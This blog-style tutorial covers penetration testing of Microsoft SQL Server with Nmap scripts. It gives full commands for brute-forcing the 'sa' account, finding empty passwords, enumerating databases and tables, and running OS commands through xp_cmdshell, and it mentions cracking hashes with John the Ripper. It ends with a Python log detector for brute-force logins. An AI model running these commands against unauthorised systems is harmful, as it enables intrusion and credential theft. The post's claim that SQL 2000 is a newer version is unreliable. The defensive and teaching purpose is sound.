SQL pen test with Nmap and the Nmap Scripting Engine

The Nmap Scripting Engine (NSE) lets us use Nmap not only as a port scanner but as a complete penetration-testing platform.

In this post we will look at some techniques we can apply on our own network to check it.

Generally, Microsoft SQL Server listens by default on port 1433.

Opening nmap, we can give the following command:

nmap -p1433 --script ms-sql-info xxx.xxx.xxx.xxx (where xxx.xxx.xxx.xxx is the IP of the SQL server). The combination of Nmap and the Nmap Scripting Engine immediately gives us information about the SQL version, as well as the instance name.


The Nmap Scripting Engine also includes ms-sql-brute, which tests passwords against the server.


The command is nmap -p1433 --script ms-sql-brute xxx.xxx.xxx.xxx. If we do not find anything, we can use a custom password list; if the file with the passwords is pass.txt, the command will be:

nmap -p1433 --script ms-sql-brute --script-args userdb=/var/pass.txt,passdb=/var/pass.txt xxx.xxx.xxx.xxx

At the same time, the Nmap Scripting Engine lets us find accounts with empty passwords on infrastructures running Microsoft SQL Server.

The command would be as follows:

nmap -p1433 --script ms-sql-empty-password xxx.xxx.xxx.xxx

Here we see that the sa account has no password. To find which databases sa has access to, we use the ms-sql-hasdbaccess script with the following arguments:

nmap -p1433 --script ms-sql-hasdbaccess.nse --script-args mssql.username=sa xxx.xxx.xxx.xxx

Then we find the tables of those databases with the following command:

nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa xxx.xxx.xxx.xxx

In newer versions of MSSQL (SQL 2000) xp_cmdshell is enabled by default, and we can execute operating system commands through Nmap scripts such as:

nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa xxx.xxx.xxx.xxx

Continuing:

nmap -p1433 --script ms-sql-xp-cmdshell --script-args ms-sql-xp-cmdshell.cmd='net users',mssql.username=sa xxx.xxx.xxx.xxx

We should also say that we can use Nmap and the Nmap Scripting Engine together with other tools such as John the Ripper. With John the Ripper we can extract the database password hashes and proceed to password cracking.
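On the server side, the ms-sql-brute and ms-sql-empty-password scripts above leave a burst of failed 'sa' logins from a single client in the SQL Server ERRORLOG. As an added example (not part of the original post), the following Python parses ERRORLOG "Logon" lines and flags that pattern; the sample log lines, the 10.0.0.x client addresses and the 5-failures-per-minute threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# SQL Server writes one "Logon" line per authentication attempt to ERRORLOG.
LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Login (?P<outcome>failed|succeeded) for user '(?P<user>[^']+)'"
    r".*\[CLIENT: (?P<client>[^\]\s]+)\]"
)

# Constructed sample ERRORLOG excerpt (assumption, not from the post): six guesses
# against 'sa' from one client within six seconds, then a successful 'sa' login from it.
_FAIL = "Login failed for user '{u}'. Reason: Password did not match that for the login provided."
SAMPLE_LOG = "\n".join(
    [f"2024-03-01 09:00:0{i}.00 Logon       {_FAIL.format(u='sa')} [CLIENT: 10.0.0.5]" for i in range(6)]
    + ["2024-03-01 09:00:07.00 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 10.0.0.5]",
       "2024-03-01 09:30:00.00 Logon       " + _FAIL.format(u="app_user") + " [CLIENT: 10.0.0.9]",
       "2024-03-01 09:31:00.00 spid12s     SQL Server is now ready for client connections."]
)

def parse_logon_events(log_text):
    """Yield (timestamp, outcome, user, client) for every Logon line; other lines are skipped."""
    for line in log_text.splitlines():
        m = LOGON_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            yield ts, m["outcome"], m["user"], m["client"]

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """One alert per client with >= threshold failed logins inside a sliding `window`.
    A later successful login from that client is reported as `succeeded_as`."""
    by_client = defaultdict(list)
    for ev in parse_logon_events(log_text):
        by_client[ev[3]].append(ev)
    alerts = []
    for client, events in by_client.items():
        events.sort()
        failures = [e for e in events if e[1] == "failed"]
        # Peak number of failures that fall within `window` of an earlier failure.
        peak = max((sum(1 for t, *_ in failures[i:] if t - t0 <= window)
                    for i, (t0, *_) in enumerate(failures)), default=0)
        if peak < threshold:
            continue
        first_fail = failures[0][0]
        succeeded_as = sorted({e[2] for e in events if e[1] == "succeeded" and e[0] > first_fail})
        alerts.append({"client": client, "failures": len(failures), "peak_in_window": peak,
                       "users": sorted({e[2] for e in failures}), "succeeded_as": succeeded_as})
    return alerts
```

Running detect_bruteforce(SAMPLE_LOG) reports only 10.0.0.5, with succeeded_as ['sa'], which is the guess-then-login sequence worth paging on; the single app_user failure from 10.0.0.9 stays below the threshold.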


We warmly thank SecTeam @johnzontos.


Written by Dimitris
